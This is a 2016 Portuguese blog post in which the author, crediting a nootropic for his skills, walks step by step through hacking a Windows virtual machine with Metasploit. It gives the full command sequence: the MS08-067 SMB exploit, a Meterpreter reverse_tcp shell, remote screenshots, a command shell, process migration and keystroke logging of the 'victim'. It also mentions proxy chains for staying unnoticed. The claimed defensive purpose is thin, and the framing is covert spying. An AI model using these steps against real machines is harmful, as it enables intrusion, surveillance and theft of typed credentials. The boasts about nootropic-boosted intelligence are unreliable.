terça-feira, 12 de abril de 2016

COMO INVADIR UM COMPUTADOR REMOTAMENTE E PARA QUE?

Alguns estão me chamando de "fraude" como já ocorreu anteriormente. Bom, conheço a verdade e sei que nem mesmo Jesus Cristo conseguiu agradar a todos. Mas a grande pergunta é, você conhece a verdade? E para aqueles que tem alguma dúvida do que eu sou capaz de fazer e que tipo de conhecimento eu detenho atualmente, após a utilização do NZT100 e acredito, que não sejam muitos os brasileiro que conheçam tais técnicas avançadas de invasão a dispositivos informáticos, e que este assunto é bem mais complexo e delicado do que se parece, aqui está a matéria. Eu não vou ensinar ninguém a fazer qualquer coisa de errado que seja ou cometer um crime cibernético. Apenas vou lhe provar que eu sei exatamente como fazer e para que fazer ações como esta, nas quais posso perfeitamente me defender.


O mais importante é compreender que toda técnica de invasão deve e precisa ser conhecida, estudada e analisada, para que se possa conseguir identificar quando uma invasão ou possível invasão está acontecendo. Somente assim é possível preservar os dados como um todo. Pois depois que uma pasta for removida ou apagada, um documento roubado ou aquela foto comprometedora, nada mais poderá ser feito.


Para isto irei utilizar duas máquinas virtuais em um ambiente 100% seguro e controlado. O tipo de invasão que irei realizar é do tipo "Intruder", ou seja: dentro de uma mesma rede, embora não seja nem um pouco diferente de uma invasão pela Internet, pois na verdade, tudo se resume apenas ao seu Endereço IP. Eu não irei entrar em muitos detalhes, mas para quem não conhece ou tem domínio sobre a área de Segurança da Informação, eu irei utilizar o MetaSploit, que é um framework que abriga ou agrupa uma série de exploits. Estes por sua vez, são códigos ou programas desenvolvidos especialmente para explorar as vulnerabilidades de qualquer aplicativo ou sistema que seja, não importando valor ou plataforma. E sinceramente ele é extremamente poderoso e cumpri rigorosamente o seu propósito. Apesar de tudo, não estamos lidando nem manipulando qualquer tipo de vírus que seja, pois o MetaSploit está muito acima disto. E para aqueles que sabem o que estão fazendo, eles sabem que tudo é realizado no "dedo" e não utilizamos qualquer programa que seja do tipo EXE. Pois agora vamos entrar no secreto mundo dos melhores hackers do mundo.


Se tiver algum problema para realizar este teste, principalmente se for em relação a "exploit completed but no session was created" ou algo deste tipo, desative o firewall ou utilize o Windows SP2. O correto é que o nmap retorne os seguintes dados para podermos avançar:


Logo, dei um comando bem básico mesmo, nmap 192.168.203.129 apenas para verificar se possui alguma porta com restrição ou que esteja fechada pelo Firewall ou Antivírus. Logo o msf me retornou que todas as 1000 portas foram filtradas e que o scam não localizou qualquer conexão aberta que seja na primeira imagem. No SP3 tivemos que desativar o Firewall do Windows, enquanto no SP2 isto não foi necessário. Isto é explorar as vulnerabilidades de um sistema da maneira mais técnica o possível. Imediatamente vou dar o comando use exploit/windows/smb/ms08_067_netapi para explorar a vulnerabilidade da porta 445/TCP. Em seguida dei um show options para verificar os parâmetros que preciso configurar no exploit para que tudo funcione como o esperado. Veja abaixo que imediatamente configuro o IP do meu alvo,o computador que será invadido no mais puro sentido da palavra. E neste caso utilize o comando set rhost 192.168.203.129. Logicamente o IP deve ser ajustado de acordo com o seu cenário local. 


Após dar outro show options para verificar se o parâmetro rhost foi configurado corretamente, vou precisar setar o payload que irei utilizar. Também é um simples comando: set payload windows/meterpreter/reverse_tcp. E ainda vou setar a porta na qual estarei invadindo o terminal: set lport 443


E fácil fácil já estou com meu payload devidamente configurado. Agora, logicamente vou definir os dados do meu backtrack, ou seja: do meu computador com o comando set lhost 192.168.203.128.   


Com tudo devidamente configurado, já posso perfeitamente executar minha seção Meterpreter e neste ponto, já estou literalmente dentro da máquina alvo e agora, neste exato momento, é que a brincadeira realmente vai começar e você vai se surpreender com o que podemos fazer. Sem que a vítima se quer saiba, sem que ela sinta, sem que sejamos se quer notados com um bom proxy, ou dependendo da complexabilidade do acesso, uma cadeia de proxys. 


Para começarmos, vamos apenas saber qual é o sistema que acabamos de invadir sem enviar qualquer arquivo que seja a nossa vítima. Sem ficar enviando aqueles e-mails chatos que enchem nossas caixas de Spans.


Observem que apenas com o comando sysinfo já peguei todos os dados do SO ou seja: Sistema Operacional da nossa vítima. Do computador alvo para ficar mais elegante. E como eu sou exatamente o que eu falo que sou, não vamos parar por aqui. Vamos conhecer o comando mais utilizado pelos hackers de todo o mundo, screenshot. Este comando simplesmente captura a tela do computador alvo e nos mostra, simples assim. Com uma única palavra.


Observem atentamente que o sistema já capturou a imagem do computador e a salvou no diretório root do nosso computador. E aí está literalmente a captura da tela do nosso computador alvo. Em menos de 2 minutos um profissional com um pouco de experiência consegue silenciosamente saber exatamente o que você está vendo ou fazendo


Gostou das informações até este momento. Bom, eu ainda quero ensinar mais e te dar a possibilidade de se defender de uma ataque que não deixa rastro, não realiza qualquer tipo de instalação, não contém vírus e é praticamente indetectável. No caso acima, eu estou com o Windows SP2 com o Firewall ativado e o antivírus devidamente instalado. Agora, vamos acessar o Prompt de Comando da máquina alvo. Para isto, basta digitar shell


E como vocês podem ver, eu estou dentro do MetaSploit e criei a pasta meterpreter remotamente no computador alvo. É tudo tão simples que chega a nem ter graça, pois da mesma forma que crio, poderia ter apagado algum arquivo fundamental ao funcionamento do sistema, pois neste caso, eu tenho acesso de ROOT ou Super Usuário. Vejam que realmente a pasta foi criada:


Já vimos vários dos principais comandos que os verdadeiros hackers utilizam. Agora vamos a um dos "comandos secretos" da Deep Web. Sem instalar qualquer coisa que seja na máquina alvo, vou neste exato momento, capturar tudo que for digitado no teclado. Vejamos como isto é possível. Será que é realmente possível ter um keylogger sem ter um keylogger 


A primeira ação que irei realizar é dar o comando exit para encerrar o Prompt de Comando do Windows ou qualquer outro. Depois vou dar o comando ps para listar todos os processos que estão sendo executados no computador alvo como mostrado acima, o 1516 referente ao explorer. Este processo varia de máquina para máquina, verifique antes de continuar. 


Como vocês podem ver, será necessário verificar qual processo poderá ou não ser migrado, no meu caso apenas o 1516 pode, enquanto o 1476 foi negado pelo computador alvo. O importe é completar a migração nesta parte com o comando primário migrate 1516. Agora vamos rodar e executar o comando secundário que me permitirá capturar todas as teclas do teclado pressionadas pela minha vítima: run post/windows/capture/keylog_recorder.


Agora vamos verificar se tudo que foi digitado foi realmente salvo pelo nosso programa espião que nem mesmo existe fisicamente. Para isto aperte CTRL+C para encerrar o monitoramento das teclas. Dentro da pasta root o seguinte comando no terminal do linux e não no metertrefe: ls -la para exibir todas as pastas ocultas no sistema. O local desta pasta pode variar, tal como seu nome. Mas o padrão sempre permanecerá o mesmo



A pasta que precisamos localizar é a .msf5 (oculta). Abra esta pasta com o comando cd. Dê um ls e imediatamente, abra a subpasta loot. Dê um novo ls e bingo. Todas as teclas digitadas no computador alvo estarão à sua inteira disposição. Veja como abrir o registro com o comando cat que é um TXT.


E está tudo aí como vocês podem ver. Tudo que foi digitado e até mesmo o site do nootropico.blogspot.com.br que eu abri para verificar se tudo estava funcionando corretamente foi capturado. Espero que tenham gostado e esta é para aqueles que ainda afirmam que meu QI ainda continua sendo 110. As possibilidades, acreditem, são ilimitadas com este conhecimento.